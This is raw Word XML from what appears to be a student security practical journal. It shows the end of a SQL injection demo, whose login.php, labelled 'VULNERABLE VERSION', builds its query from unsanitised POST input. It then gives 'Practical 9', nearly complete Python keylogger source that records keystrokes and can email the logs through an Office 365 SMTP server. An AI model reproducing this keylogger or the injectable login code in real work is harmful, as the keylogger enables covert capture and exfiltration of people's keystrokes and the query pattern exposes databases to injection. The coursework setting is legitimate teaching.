      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>br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&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D06414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Password: &lt;input type="text" name="password"&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>br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&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C3E69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&lt;input type="submit" value="Login"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13389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&lt;/form&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F72D2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&lt;/body&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369493F8" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613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3FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD54FA" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613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B1EA64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b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VULNERABLE VERSION) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79C3A3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&lt;?php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53531EB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3613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>error_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>reporting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(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0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEAF98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include "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>connect.php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"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323334E2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$username = $_POST['username']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718093B2" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613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3FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$password = $_POST['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF0C72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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127D6A20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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sql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= "SELECT * FROM users WHERE username='$username' AND password='$password'"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D1913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$result = $conn-&gt;query($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>sql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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97EABC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>if ($result &amp;&amp; $result-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>num_rows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 0) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6514F973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echo "&lt;h2&gt;Login </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Successful!&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">/h2&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B291BB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} else { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DB4CA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echo "&lt;h2&gt;Invalid Credentials&lt;/h2&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D549F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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678403D1" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9361A2" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="FreeSerif" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="FreeSerif" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">PART 3 — Run the Demo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07157599" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="FreeSerif" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="FreeSerif" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Open: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D17B7" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613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13FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="FreeSerif" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://localhost/sqli/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193BCF7" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="003613FD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</w:p>
    <w:p w14:paraId="4BC548BD" w14:textId="3DB6580D" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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3613FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175CB401" w14:textId="77777777" w:rsidR="00C210D2" w:rsidRDefault="00C210D2" w:rsidP="003613FD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6A8461FC" w14:textId="77777777" w:rsidR="003613FD" w:rsidRPr="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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106BC401" wp14:editId="0B46FF21">
            <wp:extent cx="4772025" cy="2628900"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="190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WhatsApp Image 2026-02-23 at 10.46.44 AM.jpe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2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AFECE4" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="003613FD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</w:p>
    <w:p w14:paraId="3F1FD9B2" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="003613FD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05A6F691" wp14:editId="6F6FC819">
            <wp:extent cx="4791075" cy="1609725"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="285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6-02-23 at 10.47.14 AM.jpe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09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F46AC" w14:textId="77777777" w:rsid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4D77197D" w14:textId="77777777" w:rsid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6D19A48D" w14:textId="77777777" w:rsid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BCAB4C1" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD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A850994" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD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5294F0D6" w14:textId="77777777" w:rsidR="003613FD" w:rsidRDefault="003613FD" w:rsidP="00C210D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E81583" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00170CF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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Practical 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E1F48" w14:textId="77777777" w:rsidR="002362D2" w:rsidRPr="00170CF1" w:rsidRDefault="002362D2" w:rsidP="00456A70">
      <w:pPr>
        <w:spacing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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00170CF1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>im</w:t>
      </w:r>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Create a simple keylogger using python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752B4B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import keyboard # for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keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AEBCD1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smtplib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# for sending email using SMTP protocol (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gmail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7327ACEA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218AD0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from threading import Timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7268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49ECEDA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email.mime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.multipart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MIMEMultipart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2165910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email.mime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.text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MIMEText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="507AB62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SEND_REPORT_EVERY = 60 # in seconds, 60 means 1 minute and so on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABD25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EMAIL_ADDRESS = "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email@provider.tld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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1F07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EMAIL_PASSWORD = "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password_here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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75638F7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class Keylogger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078316D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self, interval,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report_method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="email"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B108E9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self.interval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= interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A6E0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_method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report_method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D9BC71A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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32120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record start &amp; end datetimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E976D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62821FE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self.end_dt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350FBBE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callback(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self, event):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8BA4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name = event.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0001F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(name) &gt; 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57A94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if name == "space":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24061F7A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 name = " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2498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name == "enter":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAF749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ED9D68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name = "[ENTER]\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BCA29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name == "decimal":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5F51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name = "."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3488275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65AAA25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3E305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name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name.replace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(" ", "_")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD1972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name = f"[{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name.upper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()}]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1992D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7E288A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self.log += name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6242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update_filename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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204D25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start_dt_str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str(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)[:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0630F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end_dt_str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str(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self.end_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:-7].replace(" ", "-").replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E915A0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f"keylog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-{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start_dt_str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}_{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end_dt_str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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936D63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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def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report_to_file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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5E85C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with open(f"{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}.txt", "w") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6FD11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self.log, file=f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6082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print(f"[+] Saved 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}.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C635FA3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58D52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prepare_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self, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F5B99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msg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MIMEMultipart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("alternative")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DEBFD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msg["From"] = EMAIL_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66723B9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msg["To"] = EMAIL_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47663CA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msg["Subject"] = "Keylogger logs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38325A4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simple paragraph, feel free to edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDBCF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html = f"&lt;p&gt;{message}&lt;/p&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008316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text_part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MIMEText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message, "plain")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655BB05A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html_part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MIMEText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html, "html")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989638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msg.attach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text_part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76BC356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msg.attach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html_part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2D59272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after making the mail, convert back as string message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503EE2BF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msg.as_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178D975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DF402A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sendmail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self, email, password, message, verbose=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0515B76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server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smtplib.SMTP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(host="smtp.office365.com", port=587)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29A6E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connect to the SMTP server as TLS mode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( for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security )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F41C58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server.starttls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7CF0398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login to the email account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCD168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server.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email, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A4DF0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send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actual message after preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CAAC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server.sendmail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(email, email,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self.prepare_mail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(message))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0962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terminates the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECE95A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server.quit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7FC0E859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if verbose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EA98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print(f"{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)} - Sent an email to {email} containing: {message}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB4C9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report(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15B91D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6B3DD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if self.log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31273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there is something in log, report it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B96FD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self.end_dt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1903B02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# update `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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8941A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self.update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_filename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55A85EB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_method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== "email":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37464B0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self.sendmail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(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA10E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_method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== "file":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63267BCD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_to_file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56684F2C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you don't want to print in the console, comment below line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB233C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    print(f"[{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self.filename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}] - {self.log}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A6A7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7052F7D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self.log = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA3404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timer =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Timer(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interval=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self.interval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, function=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4EAA59B0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thread as daemon (dies when main thread die)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FA5C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timer.daemon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3CC7B243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timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E8EA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timer.start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4D828B9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def start(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432A056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record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start datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DD3B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6FEFF07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keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E8EF0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keyboard.on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_release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(callback=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self.callback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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26CBAB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start reporting the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keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="746016B7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self.report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2554622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a simple message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3145DC11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print(f"{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datetime.now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>)} - Started keylogger")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60183B9C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block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 the current thread, wait until CTRL+C is pressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3BBCC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keyboard.wait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363838B5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5E4490E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keylogger = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Keylogger(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">interval=SEND_REPORT_EVERY, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>report_method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="file")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D354A2" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00A230A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0C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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keylogger.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362ADAE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ADDC74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EF2BBA" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRDefault="00170CF1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CF1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D6D5363" w14:textId="77777777" w:rsidR="00170CF1" w:rsidRPr="00170CF1" w:rsidRDefault="00170CF1" w:rsidP="00456A7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24EE7C" w14:textId="24F7B9DA" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00266E75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6E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1B10B" wp14:editId="32D59600">
            <wp:extent cx="5943600" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11701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06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C5B8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F6DFEF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F9C797" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="00F24CBB" w:rsidP="00456A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24CBB" w:rsidRPr="00170CF1" w:rsidSect="00B073E0">
      <w:headerReference w:type="default" r:id="rId50"/>
      <w:footerReference w:type="default" r:id="rId51"/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03DB9" w14:textId="77777777" w:rsidR="00210690" w:rsidRDefault="00210690" w:rsidP="00570EE1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="73C5DA91" w14:textId="77777777" w:rsidR="00210690" w:rsidRDefault="00210690" w:rsidP="00570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296CF4A-75AC-44B0-8AC9-286DF25D3A2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A6221916-77E1-436D-875F-449A3FF9EE17}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eeSerif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CDDA982-EA27-426D-9D95-B00141D7E39E}"/>
    <w:embedBold r:id="rId4" w:fontKey="{7F976A33-B865-46E0-B622-2F5E3BE2B3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E2A5D1-90E8-467B-80D2-F6E98E6F29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48F1D" w14:textId="1F80F777" w:rsidR="006E5BE8" w:rsidRPr="000A0869" w:rsidRDefault="006E5BE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
      </w:rPr>
      <w:t xml:space="preserve">Name: </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7E6341D8" w14:textId="4C7E4A2A" w:rsidR="006E5BE8" w:rsidRPr="000A0869" w:rsidRDefault="006E5BE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
      </w:rPr>
      <w:t>Roll No:</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="40E1F467" w14:textId="0F716E53" w:rsidR="006E5BE8" w:rsidRPr="000A0869" w:rsidRDefault="006E5BE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
      </w:rPr>
      <w:t>Class:</w:t>
    </w:r>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3769F3DA" w14:textId="0F074E83" w:rsidR="006E5BE8" w:rsidRPr="000A0869" w:rsidRDefault="006E5BE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000A0869">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
      </w:rPr>
